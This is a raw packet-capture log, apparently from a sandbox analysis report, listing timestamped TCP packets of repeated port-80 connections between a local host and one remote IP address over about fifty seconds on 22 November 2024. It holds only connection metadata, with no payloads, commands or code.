Nov 22, 2024 17:39:03.187405109 CET	80	49781	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:03.187494993 CET	49781	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:03.307110071 CET	80	49781	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:04.480725050 CET	80	49781	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:04.480839968 CET	80	49781	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:04.480951071 CET	49781	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:04.481015921 CET	49781	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:04.600570917 CET	80	49781	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:04.628365040 CET	49787	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:04.748048067 CET	80	49787	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:04.750089884 CET	49787	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:04.751878023 CET	49787	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:04.873462915 CET	80	49787	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:04.874345064 CET	49787	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:04.994447947 CET	80	49787	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:06.235555887 CET	80	49787	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:06.235800982 CET	80	49787	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:06.235877037 CET	49787	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:06.235929966 CET	49787	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:06.355478048 CET	80	49787	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:06.378495932 CET	49788	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:06.499408007 CET	80	49788	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:06.499619007 CET	49788	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:06.501547098 CET	49788	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:06.624631882 CET	80	49788	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:06.624696970 CET	49788	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:06.745925903 CET	80	49788	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:07.860249996 CET	80	49788	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:07.860367060 CET	80	49788	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:07.860410929 CET	49788	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:07.860447884 CET	49788	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:07.980187893 CET	80	49788	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:08.004100084 CET	49794	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:08.125183105 CET	80	49794	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:08.125297070 CET	49794	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:08.127332926 CET	49794	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:08.248356104 CET	80	49794	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:08.251882076 CET	49794	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:08.373492002 CET	80	49794	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:09.681982994 CET	80	49794	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:09.682146072 CET	49794	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:09.682370901 CET	80	49794	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:09.682441950 CET	49794	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:09.802908897 CET	80	49794	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:09.832218885 CET	49800	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:09.951980114 CET	80	49800	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:09.952083111 CET	49800	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:09.955069065 CET	49800	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:10.074831009 CET	80	49800	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:10.075035095 CET	49800	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:10.195442915 CET	80	49800	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:11.305012941 CET	80	49800	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:11.305165052 CET	80	49800	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:11.305203915 CET	49800	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:11.305252075 CET	49800	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:11.424820900 CET	80	49800	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:11.451225996 CET	49806	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:11.570990086 CET	80	49806	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:11.571108103 CET	49806	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:11.574165106 CET	49806	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:11.694134951 CET	80	49806	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:11.694205046 CET	49806	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:11.816440105 CET	80	49806	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:13.054687023 CET	80	49806	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:13.054754972 CET	80	49806	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:13.054806948 CET	49806	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:13.054968119 CET	49806	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:13.174860954 CET	80	49806	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:13.207679987 CET	49807	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:13.327430964 CET	80	49807	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:13.327531099 CET	49807	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:13.330580950 CET	49807	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:13.452759027 CET	80	49807	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:13.452853918 CET	49807	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:13.572524071 CET	80	49807	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:14.727401018 CET	80	49807	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:14.727694988 CET	80	49807	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:14.727840900 CET	49807	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:14.727955103 CET	49807	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:14.848103046 CET	80	49807	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:14.862828970 CET	49814	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:14.982588053 CET	80	49814	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:14.982724905 CET	49814	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:14.984954119 CET	49814	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:15.106004953 CET	80	49814	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:15.106128931 CET	49814	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:15.225786924 CET	80	49814	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:16.480851889 CET	80	49814	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:16.480959892 CET	80	49814	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:16.481024027 CET	49814	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:16.481060982 CET	49814	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:16.600800037 CET	80	49814	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:16.630595922 CET	49820	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:16.750190973 CET	80	49820	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:16.751986027 CET	49820	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:16.753679037 CET	49820	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:16.873368979 CET	80	49820	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:16.873575926 CET	49820	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:16.993340969 CET	80	49820	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:18.289005995 CET	80	49820	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:18.289077044 CET	80	49820	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:18.289205074 CET	49820	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:18.289644957 CET	49820	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:18.412864923 CET	80	49820	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:18.529416084 CET	49826	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:18.650351048 CET	80	49826	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:18.650458097 CET	49826	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:18.652259111 CET	49826	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:18.772546053 CET	80	49826	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:18.772634029 CET	49826	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:18.892538071 CET	80	49826	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:20.131437063 CET	80	49826	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:20.131473064 CET	80	49826	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:20.131550074 CET	49826	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:20.131692886 CET	49826	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:20.251127005 CET	80	49826	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:20.269785881 CET	49830	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:20.389367104 CET	80	49830	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:20.391848087 CET	49830	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:20.393621922 CET	49830	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:20.513151884 CET	80	49830	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:20.515913963 CET	49830	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:20.636499882 CET	80	49830	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:21.922034025 CET	80	49830	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:21.922180891 CET	80	49830	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:21.922261953 CET	49830	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:21.922321081 CET	49830	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:22.044326067 CET	80	49830	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:22.066808939 CET	49834	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:22.186733007 CET	80	49834	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:22.186948061 CET	49834	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:22.188827991 CET	49834	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:22.314522982 CET	80	49834	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:22.314599991 CET	49834	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:22.439863920 CET	80	49834	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:23.676054955 CET	80	49834	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:23.676175117 CET	49834	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:23.676268101 CET	80	49834	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:23.676318884 CET	49834	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:23.796269894 CET	80	49834	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:23.824381113 CET	49839	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:23.944221020 CET	80	49839	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:23.944381952 CET	49839	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:23.947361946 CET	49839	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:24.067006111 CET	80	49839	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:24.067070961 CET	49839	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:24.186597109 CET	80	49839	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:25.302767992 CET	80	49839	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:25.302884102 CET	80	49839	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:25.302977085 CET	49839	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:25.303193092 CET	49839	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:25.422629118 CET	80	49839	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:25.454355955 CET	49845	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:25.574307919 CET	80	49845	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:25.574544907 CET	49845	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:25.577486992 CET	49845	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:25.697432995 CET	80	49845	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:25.697513103 CET	49845	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:25.817264080 CET	80	49845	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:27.054007053 CET	80	49845	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:27.054131985 CET	80	49845	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:27.054176092 CET	49845	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:27.054210901 CET	49845	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:27.173858881 CET	80	49845	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:27.193262100 CET	49851	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:27.313162088 CET	80	49851	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:27.313330889 CET	49851	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:27.315241098 CET	49851	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:27.435455084 CET	80	49851	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:27.435691118 CET	49851	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:27.555305004 CET	80	49851	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:28.888890028 CET	80	49851	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:28.889019012 CET	49851	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:28.889079094 CET	80	49851	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:28.889134884 CET	49851	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:29.008703947 CET	80	49851	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:29.035540104 CET	49853	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:29.155242920 CET	80	49853	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:29.155498981 CET	49853	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:29.157468081 CET	49853	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:29.277345896 CET	80	49853	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:29.277427912 CET	49853	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:29.397070885 CET	80	49853	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:30.602054119 CET	80	49853	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:30.602082014 CET	80	49853	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:30.602180004 CET	49853	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:30.602238894 CET	49853	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:30.723331928 CET	80	49853	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:30.738857031 CET	49858	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:30.858542919 CET	80	49858	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:30.858638048 CET	49858	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:30.860815048 CET	49858	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:30.980386972 CET	80	49858	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:30.980501890 CET	49858	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:31.100344896 CET	80	49858	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:32.319843054 CET	80	49858	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:32.319974899 CET	49858	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:32.320007086 CET	80	49858	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:32.320063114 CET	49858	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:32.439587116 CET	80	49858	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:32.460311890 CET	49864	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:32.580173016 CET	80	49864	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:32.580312967 CET	49864	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:32.582351923 CET	49864	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:32.779086113 CET	80	49864	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:32.779201984 CET	49864	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:32.934107065 CET	80	49864	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:34.064419031 CET	80	49864	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:34.064527035 CET	49864	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:34.064604044 CET	80	49864	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:34.064646006 CET	49864	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:34.184104919 CET	80	49864	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:34.212327003 CET	49869	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:34.331859112 CET	80	49869	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:34.331958055 CET	49869	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:34.334594965 CET	49869	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:34.454606056 CET	80	49869	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:34.454699993 CET	49869	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:34.574393988 CET	80	49869	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:35.909826040 CET	80	49869	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:35.909848928 CET	80	49869	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:35.909914970 CET	49869	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:35.910069942 CET	49869	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:36.030122995 CET	80	49869	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:36.391951084 CET	49875	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:36.511449099 CET	80	49875	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:36.511543036 CET	49875	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:36.518543959 CET	49875	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:36.638083935 CET	80	49875	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:36.638263941 CET	49875	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:36.757836103 CET	80	49875	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:37.911163092 CET	80	49875	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:37.911422968 CET	80	49875	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:37.911434889 CET	49875	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:37.911483049 CET	49875	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:38.031130075 CET	80	49875	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:38.073164940 CET	49878	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:38.192841053 CET	80	49878	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:38.195971966 CET	49878	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:38.199114084 CET	49878	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:38.319088936 CET	80	49878	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:38.319160938 CET	49878	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:38.438910961 CET	80	49878	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:39.774283886 CET	80	49878	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:39.774358034 CET	80	49878	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:39.774405003 CET	49878	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:39.774466991 CET	49878	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:39.893944025 CET	80	49878	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:39.911514997 CET	49883	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:40.031264067 CET	80	49883	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:40.031404018 CET	49883	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:40.033540964 CET	49883	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:40.156470060 CET	80	49883	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:40.156593084 CET	49883	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:40.276273966 CET	80	49883	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:41.435794115 CET	80	49883	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:41.435904026 CET	80	49883	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:41.435945988 CET	49883	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:41.435991049 CET	49883	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:41.556668997 CET	80	49883	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:41.590384960 CET	49889	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:41.709949017 CET	80	49889	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:41.710035086 CET	49889	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:41.712372065 CET	49889	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:41.831861019 CET	80	49889	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:41.832001925 CET	49889	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:41.951833963 CET	80	49889	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:43.209742069 CET	80	49889	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:43.209940910 CET	49889	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:43.211462021 CET	80	49889	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:43.211534023 CET	49889	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:43.330265999 CET	80	49889	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:43.356964111 CET	49894	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:43.476849079 CET	80	49894	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:43.476964951 CET	49894	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:43.480339050 CET	49894	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:43.599814892 CET	80	49894	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:43.599899054 CET	49894	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:43.719422102 CET	80	49894	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:44.928255081 CET	80	49894	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:44.928389072 CET	49894	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:44.928430080 CET	80	49894	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:44.928484917 CET	49894	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:45.051310062 CET	80	49894	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:45.065685034 CET	49898	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:45.185334921 CET	80	49898	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:45.185427904 CET	49898	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:45.187427044 CET	49898	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:45.307025909 CET	80	49898	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:45.307094097 CET	49898	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:45.426630974 CET	80	49898	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:46.763998985 CET	80	49898	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:46.764098883 CET	80	49898	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:46.764115095 CET	49898	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:46.764152050 CET	49898	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:46.887092113 CET	80	49898	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:46.910146952 CET	49902	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:47.032720089 CET	80	49902	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:47.032844067 CET	49902	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:47.035160065 CET	49902	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:47.159826040 CET	80	49902	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:47.159996986 CET	49902	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:47.284257889 CET	80	49902	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:48.566066980 CET	80	49902	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:48.566159964 CET	80	49902	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:48.566330910 CET	49902	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:48.566330910 CET	49902	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:48.686602116 CET	80	49902	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:48.927112103 CET	49907	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:49.046622992 CET	80	49907	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:49.046719074 CET	49907	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:49.049055099 CET	49907	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:49.169121981 CET	80	49907	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:49.169188976 CET	49907	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:49.290102005 CET	80	49907	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:50.496753931 CET	80	49907	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:50.496933937 CET	80	49907	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:50.496974945 CET	49907	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:50.497009993 CET	49907	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:50.616894007 CET	80	49907	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:50.651004076 CET	49913	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:50.770690918 CET	80	49913	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:50.770804882 CET	49913	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:50.772958040 CET	49913	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:50.892405033 CET	80	49913	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:50.892508984 CET	49913	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:51.012083054 CET	80	49913	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:52.341576099 CET	80	49913	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:52.341768980 CET	80	49913	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:52.341897011 CET	49913	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:52.341897011 CET	49913	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:52.461464882 CET	80	49913	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:52.500437021 CET	49917	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:52.620732069 CET	80	49917	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:52.620826006 CET	49917	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:52.622878075 CET	49917	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:52.742398977 CET	80	49917	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:52.742489100 CET	49917	80	192.168.2.4	94.156.177.41
Nov 22, 2024 17:39:52.862409115 CET	80	49917	94.156.177.41	192.168.2.4
Nov 22, 2024 17:39:54.151818037 CET	80	49917	94.156.177.41	192.168.2.4
